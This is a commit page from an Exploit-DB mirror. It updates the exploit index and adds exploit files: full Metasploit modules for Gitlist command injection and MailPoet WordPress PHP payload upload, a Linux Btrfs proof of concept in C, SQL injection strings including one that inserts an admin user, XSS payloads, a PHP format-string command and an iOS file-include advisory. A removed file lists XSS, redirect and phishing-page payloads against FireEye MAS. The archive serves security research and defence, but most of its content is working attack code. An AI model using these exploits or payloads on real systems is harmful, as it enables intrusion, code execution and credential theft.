bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-09 04:38:20 +00:00
parent 2720bb044f
commit a4102ef337
23 changed files with 2255 additions and 88 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -30579,7 +30579,6 @@ id,file,description,date,author,platform,type,port
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
33955,platforms/php/webapps/33955.txt,"FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities",2014-07-02,kmkz,php,webapps,0
33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
@ -30610,3 +30609,24 @@ id,file,description,date,author,platform,type,port
33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0
33988,platforms/php/remote/33988.txt,"PHP 5.x 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002
33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80
33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80
33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0
33993,platforms/php/webapps/33993.txt,"Planet Script 1.x 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0
33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0
33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0
33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0
33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 'download.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 'chatsmileys.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA 'list' Parameter Cross Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0
34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0
34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0

Can't render this file because it is too large.

11
platforms/asp/webapps/33992.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40201/info
Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Platnik 8.01.001 is affected; other versions may also be vulnerable.
INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--
INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--
or 1=1--

237
platforms/ios/webapps/33996.txt Executable file
View file

@ -0,0 +1,237 @@
Document Title:
===============
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1277
Release Date:
=============
2014-07-04
Vulnerability Laboratory ID (VL-ID):
====================================
1277
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
Create great photo albums and video diaries with PhotoOrg. Keep your photo album and video diary secured with passwords.
Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, Flickr and MySpace with family, friends
and business associates.
Photo Editor with the following ability:
-Over eleven photo effects
-Four different photo enhancer
-Rotate and flip photo
-Crop photo
-Change photo brightness
-Change photo Contrast
-Change photo saturation
-Change photo sharpness
-Draw on photo with different colors
-Write text on your photo
-Remove red eyes
-Whiten photo
-Remove blemish on photo
Features:
-view your pictures and videos using your browser
-upload your picture and video using your browser
-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace
-upload multiple pictures to Facebook, Twitter, Flickr and MySpace
-Keep your photo and videos organized the way you like it
-Keep your photo and video secured with password
-copy your photo and video from anywhere and paste them into the application
( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official WonderApplications Photo Org v8.3 iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2014-07-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
WonderApplications
Product: Photo Org L - iOS Mobile Application 8.3
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official WonderApplications Photo Org v8.3 iOS web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `uploadMedia` (uploadfile) module. Remote attackers are able to inject
own files with malicious `filename` values in the `uploadMedia` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file/folder list context next to the vulnerable name/path value. The attacker is able
to inject the local file request by usage of the available `wifi interface` for file exchange/share.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 7.1. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low
user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected
device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WonderApplications - WiFi Share
Vulnerable Module(s):
[+] uploadMedia
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost:[port-x]/)
Proof of Concept (PoC):
=======================
The local file inlcude web vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: WonderApplications (Photo & Video) - Index- & Sub-Categories
<html><head><style type="text/css">
ul {float:left; width:100%; padding:0; margin:0; list-style-type:none; }
a { float:left; width:6em; text-decoration:none; color:white; background-color:purple; padding:0.2em 0.6em; border-right:1px solid white; }
a:hover {background-color:#ff3300} li {display:inline} table {float:left} </style></head>
<body><h1 style="color:orange;text-align:center">WonderApplications</h1><ul> <li><a href="Photo_33457298432">Foto</a></li>
<li><a href="Video_33457298432">Video</a></li> <li><a href="Load_33457298432">Load</a></li> </ul><table border="1"><tbody><tr><td>
<a href="abcde"><img src="http://localhost:8080/var/mobile/Applications/FB0FAD2F-8D06-4485-879B-0452C05067EC/Documents/mediaPath/00/C01FCCB0-DBDA-4A80-8C6A-67F02D3FE0A9.PNG" alt="abcde"></a>
<br \=""> abcde </td><td> <a href="abcdef ././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip">
<img src="http://localhost:8080/././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip/
FB0FAD2F-8D06-4485-879B-0452C05067EC/Documents/mediaPath/00/6EFCA2A7-E8F8-4251-8EFB-85EF327998FF.PNG"
alt="abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"></a> <br \="">
abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip">
</td></table></body></html></iframe></td></tr></tbody></table></body></html>
--- Poc Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/uploadMedia Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/uploadMedia]
POST-Daten:
POST_DATA[-----------------------------276732337522317
Content-Disposition: form-data; name="file"; filename="././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"
Content-Type: application/zip
-
20:40:52.394[62ms][total 79ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2874] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Type[text/html]
Content-Length[2874]
Reference(s):
http://localhost:8080/
http://localhost:8080/uploadMedia
http://localhost:8080/var/mobile/Applications/
Solution - Fix & Patch:
=======================
The local file include web vulnerability bug can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
Encode also the filename value in the file dir listing of the index and sub categories.
Restrict the filename value name input and prevent executions by a secure file filter on upload extension or the name validation itself.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

29
platforms/linux/local/34001.c Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/40241/info
The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.
An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks.
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)
int main(int argc, char * argv[])
{
if(argc < 3) {
printf("Usage: %s [target] [output]\n", argv[0]);
exit(-1);
}
int output = open(argv[2], O_WRONLY | O_CREAT, 0644);
/* Note - opened for writing, not reading */
int target = open(argv[1], O_WRONLY);
ioctl(output, BTRFS_IOC_CLONE, target);
}

119
platforms/multiple/remote/33990.rb Executable file
View file

@ -0,0 +1,119 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'drone', #discovery/poc by @dronesec
'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
],
'Payload' =>
{
'Space' => 8192, # max length of GET request really
'BadChars' => "&\x20",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>
[
['Gitlist 0.4.0', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 30 2014'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
], self.class)
end
def check
repo = get_repo
if repo.nil?
return Exploit::CheckCode::Unknown
end
chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))
res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")
if res && res.body
if res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
elsif res.body.to_s =~ /sh.*not found/
return Exploit::CheckCode::Vulnerable
end
end
Exploit::CheckCode::Safe
end
def exploit
repo = get_repo
if repo.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
end
send_command(repo, payload.encoded)
end
def get_repo
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/")
})
unless res
return nil
end
first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)
unless first_repo && first_repo.length >= 2
return nil
end
repo_name = first_repo[1]
repo_name
end
def send_command(repo, cmd)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
}, 1)
res
end
end

18
platforms/multiple/webapps/33995.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/40212/info
Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks.
The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Blaze Apps 1.4.0.051909 and prior are vulnerable.
HTML Injection
<script>alert('Stored XSS')</script>
SQL Injection
aa' OR [SQL] OR 'a'='1

9
platforms/multiple/webapps/34000.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40236/info
Serialsystem is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Serialsystem 1.0.4 BETA is vulnerable; other versions may also be affected.
http://www.example.com/Serials/upload/?list=<img+src=http://www.example.com/New.bmp+onload=alert(213771818860)>

10
platforms/php/remote/33988.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40173/info
PHP is prone to multiple format-string vulnerabilities because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers can exploit these issues to run arbitrary code within the context of the PHP process. This may allow them to bypass intended security restrictions or gain elevated privileges.
PHP 5.3 through 5.3.2 are vulnerable.
$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');"

143
platforms/php/remote/33991.rb Executable file
View file

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
functionality to upload a zip file containing the payload. The plugin used the
admin_init hook, which is also executed for unauthenticated users when accessing
a specific URL. The developers tried to fix the vulnerablility
in version 2.6.7 but the fix can be bypassed. In PHPs default configuration,
a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
uses $_REQUEST to check for access rights. By setting the POST parameter to
something not beginning with 'wysija_', the check is bypassed. Wordpress uses
the $_GET array to determine the page and is so not affected by this.
},
'Author' =>
[
'Marc-Alexandre Montpas', # initial discovery
'Christian Mehlmauer' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
[ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
[ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 1 2014'))
end
def create_zip_file(theme_name, payload_name)
# the zip file must match the following:
# -) Exactly one folder representing the theme name
# -) A style.css in the theme folder
# -) Additional files in the folder
content = {
::File.join(theme_name, 'style.css') => '',
::File.join(theme_name, payload_name) => payload.encoded
}
zip_file = Rex::Zip::Archive.new
content.each_pair do |name, content|
zip_file.add_file(name, content)
end
zip_file.pack
end
def check
readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
res = send_request_cgi({
'uri' => readme_url,
'method' => 'GET'
})
# no readme.txt present
if res.nil? || res.code != 200
return Msf::Exploit::CheckCode::Unknown
end
# try to extract version from readme
# Example line:
# Stable tag: 2.6.6
version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
# readme present, but no version number
if version.nil?
return Msf::Exploit::CheckCode::Detected
end
print_status("#{peer} - Found version #{version} of the plugin")
if Gem::Version.new(version) < Gem::Version.new('2.6.8')
return Msf::Exploit::CheckCode::Appears
else
return Msf::Exploit::CheckCode::Safe
end
end
def exploit
theme_name = rand_text_alpha(10)
payload_name = "#{rand_text_alpha(10)}.php"
zip_content = create_zip_file(theme_name, payload_name)
uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')
data = Rex::MIME::Message.new
data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
data.add_part('themeupload', nil, nil, 'form-data; name="action"')
data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
post_data = data.to_s
payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
print_status("#{peer} - Uploading payload to #{payload_uri}")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
'data' => post_data
})
if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end
# Files to cleanup (session is dropped in the created folder):
# style.css
# the payload
# the theme folder (manual cleanup)
register_files_for_cleanup('style.css', payload_name)
print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
print_status("#{peer} - Executing payload #{payload_uri}")
res = send_request_cgi({
'uri' => payload_uri,
'method' => 'GET'
})
end
end

87
platforms/php/webapps/33955.txt
View file

@ -1,87 +0,0 @@
# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities
# Google Dork: none
# Date: 06/05/2014
# Exploit Author: kmkz (Bourbon Jean-Marie)
# Vendor Homepage: http://www.fireeye.com/fr/fr/
# Software Link: http://www.fireeye.com/products-and-solutions/
# Version: 6.4.1
# CVE : none
*************************************************************
*[Audit Type] web IHM ONLY / Full black-box audit *
* *
*[Multiples Vulnerabilities] *
* *
* 3 XSS (reflected) *
* 1 CSRF *
* 1 NoSQLi (Json object) *
* 1 PostGreSQL SQLi (Exploitable?) *
* 1 File and Path Disclosure *
* 1 Source code Info-leak *
* *
*************************************************************
[*] XSS:
+First XSS (reflected):
https://192.168.1.50/yara/show_ya_file?name=<body onload=alert('XSSED')>
PoC :
Redirection:
https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
Url encoded redirection payload:
https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09
Phishing page PoC:
https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
Url encoded phishing page payload:
https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E
+Second XSS (reflected):
https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
+Third XSS (reflected):
https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
Show Cookie PoC:
